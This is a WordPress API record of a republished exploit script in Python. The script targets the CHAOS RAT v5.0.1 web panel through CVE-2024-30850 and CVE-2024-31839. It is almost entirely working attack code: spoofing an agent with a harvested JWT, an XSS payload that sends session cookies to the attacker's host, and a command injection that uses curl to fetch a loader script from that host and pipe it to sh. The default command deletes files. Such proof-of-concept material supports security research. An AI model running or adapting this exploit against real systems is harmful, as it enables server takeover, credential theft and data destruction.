{"id":56198,"date":"2024-04-10T20:21:27","date_gmt":"2024-04-10T16:21:27","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178009\/chaosrat501-exec.txt"},"modified":"2024-04-10T20:21:27","modified_gmt":"2024-04-10T16:21:27","slug":"chaos-rat-5-0-1-remote-command-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/chaos-rat-5-0-1-remote-command-execution\/","title":{"rendered":"CHAOS RAT 5.0.1 Remote Command Execution"},"content":{"rendered":"

# Exploit Title: CHAOS RAT v5.0.1 RCE
# Date: 2024-04-05
# Exploit Author: @_chebuya
# Software Link: https:\/\/github.com\/tiagorlampert\/CHAOS
# Version: v5.0.1
# Tested on: Ubuntu 20.04 LTS
# CVE: CVE-2024-30850, CVE-2024-31839
# Description: The CHAOS RAT web panel is vulnerable to command injection, which can be triggered from an XSS, allowing an attacker to takeover the RAT server
# Github: https:\/\/github.com\/chebuya\/CVE-2024-30850-chaos-rat-rce-poc
# Blog: https:\/\/blog.chebuya.com\/posts\/remote-code-execution-on-chaos-rat-via-spoofed-agents\/
import time
import requests
import threading
import json
import websocket
import http.client
import argparse
import sys
import re<\/p>\n

from functools import partial
from http.server import BaseHTTPRequestHandler, HTTPServer<\/p>\n

class Collector(BaseHTTPRequestHandler):
def __init__(self, ip, port, target, command, video_name, *args, **kwargs):
self.ip = ip
self.port = port
self.target = target
self.shell_command = command
self.video_name = video_name
super().__init__(*args, **kwargs)<\/p>\n

def do_GET(self):
if self.path == “\/loader.sh”:
self.send_response(200)
self.end_headers()
command = str.encode(self.shell_command)
self.wfile.write(command)
elif self.path == “\/video.mp4”:
with open(self.video_name, ‘rb’) as f:
self.send_response(200)
self.send_header(‘Content-type’, ‘video\/mp4’)
self.end_headers()
self.wfile.write(f.read())
else:
cookie = self.path.split(“=”)[1]self.send_response(200)
self.end_headers()
self.wfile.write(b””)<\/p>\n

background_thread = threading.Thread(target=run_exploit, args=(cookie, self.target, self.ip, self.port))
background_thread.start()<\/p>\n

def convert_to_int_array(string):
int_array = []for char in string:
int_array.append(ord(char))
return int_array<\/p>\n

def extract_client_info(path):
with open(path, ‘rb’) as f:
data = str(f.read())<\/p>\n

address_regexp = r”main\\.ServerAddress=(?:[0-9]{1,3}\\.){3}[0-9]{1,3}”
address_pattern = re.compile(address_regexp)
address = address_pattern.findall(data)[0].split(“=”)[1]\n

port_regexp = r”main\\.Port=\\d{1,6}”
port_pattern = re.compile(port_regexp)
port = port_pattern.findall(data)[0].split(“=”)[1]\n

jwt_regexp = r”main\\.Token=[a-zA-Z0-9_\\.\\-+\/=]*\\.[a-zA-Z0-9_\\.\\-+\/=]*\\.[a-zA-Z0-9_\\.\\-+\/=]*”
jwt_pattern = re.compile(jwt_regexp)
jwt = jwt_pattern.findall(data)[0].split(“=”)[1]\n

return f”{address}:{port}”, jwt<\/p>\n

def keep_connection(target, cookie, hostname, username, os_name, mac, ip):<\/p>\n

print(“Spoofing agent connection”)
headers = {
“Cookie”: f”jwt={cookie}”
}<\/p>\n

while True:
data = {“hostname”: hostname, “username”:username,”user_id”: username,”os_name”: os_name, “os_arch”:”amd64″, “mac_address”: mac, “local_ip_address”: ip, “port”:”8000″, “fetched_unix”:int(time.time())}
r = requests.get(f”http:\/\/{target}\/health”, headers=headers)
r = requests.post(f”http:\/\/{target}\/device”, headers=headers, json=data)
time.sleep(30)<\/p>\n

def handle_command(target, cookie, mac, ip, port):
print(“Waiting to serve malicious command outupt”)
headers = {
“Cookie”: f”jwt={cookie}”,
“X-Client”: mac
}<\/p>\n

ws = websocket.WebSocket()
ws.connect(f’ws:\/\/{target}\/client’, header=headers)
while True:
response = ws.recv()<\/p>\n

command = json.loads(response)[‘command’]data = {“client_id”: mac, “response”: convert_to_int_array(f”<\/pre><script>var i = new Image;i.src=’http:\/\/{ip}:{port}\/’+document.cookie;<\/script><video loop controls autoplay><source src=\\”http:\/\/{ip}:{port}\/video.mp4\\” type=\\”video\/mp4\\”><\/video>”), “has_error”: False}<\/p>\n

ws.send_binary(json.dumps(data))<\/p>\n

def run_exploit(cookie, target, ip, port):
print(f”Exploiting {target} with JWT {cookie}”)
conn = http.client.HTTPConnection(target)
headers = {
‘User-Agent’: ‘Mozilla\/5.0 (X11; Linux x86_64; rv:109.0) Gecko\/20100101 Firefox\/115.0’,
‘Content-Type’: ‘multipart\/form-data; boundary=—————————196428912119225031262745068932’,
‘Cookie’: f’jwt={cookie}’
}
conn.request(
‘POST’,
‘\/generate’,
f’—————————–196428912119225031262745068932\\r\\nContent-Disposition: form-data; name=”address”\\r\\n\\r\\nhttp:\/\/localhost\\’$(IFS=];b=curl]{ip}:{port}\/loader.sh;$b|sh)\\’\\r\\n—————————–196428912119225031262745068932\\r\\nContent-Disposition: form-data; name=”port”\\r\\n\\r\\n8080\\r\\n—————————–196428912119225031262745068932\\r\\nContent-Disposition: form-data; name=”os_target”\\r\\n\\r\\n1\\r\\n—————————–196428912119225031262745068932\\r\\nContent-Disposition: form-data; name=”filename”\\r\\n\\r\\n\\r\\n—————————–196428912119225031262745068932\\r\\nContent-Disposition: form-data; name=”run_hidden”\\r\\n\\r\\nfalse\\r\\n—————————–196428912119225031262745068932–\\r\\n’,
headers
)<\/p>\n

def run(ip, port, target, command, video_name):
server_address = (ip, int(port))<\/p>\n

collector = partial(Collector, ip, port, target, command, video_name)
httpd = HTTPServer(server_address, collector)
print(f’Server running on port {ip}:{port}’)
httpd.serve_forever()<\/p>\n

if __name__ == “__main__”:
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers(dest=”option”)<\/p>\n

exploit = subparsers.add_parser(“exploit”)
exploit.add_argument(“-f”, “–file”, help=”The path to the CHAOS client”)
exploit.add_argument(“-t”, “–target”, help=”The url of the CHAOS server (127.0.0.1:8080)”)
exploit.add_argument(“-c”, “–command”, help=”The command to use”, default=r”find \/ -name chaos.db -exec rm -f {} \\;”)
exploit.add_argument(“-v”, “–video-name”, help=”The video name to use”, default=”rickroll.mp4″)
exploit.add_argument(“-j”, “–jwt”, help=”The JWT token to use”)
exploit.add_argument(“-l”, “–local-ip”, help=”The local IP to use for serving bash script and mp4″, required=True)
exploit.add_argument(“-p”, “–local-port”, help=”The local port to use for serving bash script and mp4″, default=8000)
exploit.add_argument(“-H”, “–hostname”, help=”The hostname to use for the spoofed client”, default=”DC01″)
exploit.add_argument(“-u”, “–username”, help=”The username to use for the spoofed client”, default=”Administrator”)
exploit.add_argument(“-o”, “–os”, help=”The OS to use for the spoofed client”, default=”Windows”)
exploit.add_argument(“-m”, “–mac”, help=”The MAC address to use for the spoofed client”, default=”3f:72:58:91:56:56″)
exploit.add_argument(“-i”, “–ip”, help=”The IP address to use for the spoofed client”, default=”10.0.17.12″)<\/p>\n

extract = subparsers.add_parser(“extract”)
extract.add_argument(“-f”, “–file”, help=”The path to the CHAOS client”, required=True)<\/p>\n

args = parser.parse_args()<\/p>\n

if args.option == “exploit”:
if args.target != None and args.jwt != None:
target = args.target
jwt = args.jwt
elif args.file != None:
target, jwt = extract_client_info(args.file)
else:
exploit.print_help(sys.stderr)
sys.exit(1)<\/p>\n

bg = threading.Thread(target=keep_connection, args=(target, jwt, args.hostname, args.username, args.os, args.mac, args.ip))
bg.start()<\/p>\n

cmd = threading.Thread(target=handle_command, args=(target, jwt, args.mac, args.local_ip, args.local_port))
cmd.start()<\/p>\n

server = threading.Thread(target=run, args=(args.local_ip, args.local_port, target, args.command, args.video_name))
server.start()<\/p>\n

elif args.option == “extract”:
target, jwt = extract_client_info(args.file)
print(f”CHAOS server: {target}\\nJWT: {jwt}”)
else:
parser.print_help(sys.stderr)
sys.exit(1)<\/p>\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: CHAOS RAT v5.0.1 RCE# Date: 2024-04-05# Exploit Author: @_chebuya# Software Link: https:\/\/github.com\/tiagorlampert\/CHAOS# Version: v5.0.1 # Tested on: Ubuntu 20.04 LTS# CVE: CVE-2024-30850, CVE-2024-31839# Description: The CHAOS RAT web panel is vulnerable to command injection, which can be triggered from an XSS, allowing an attacker to takeover the RAT server# Github: https:\/\/github.com\/chebuya\/CVE-2024-30850-chaos-rat-rce-poc# Blog: …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56198","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56198","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56198"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56198\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56198"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56198"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56198"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}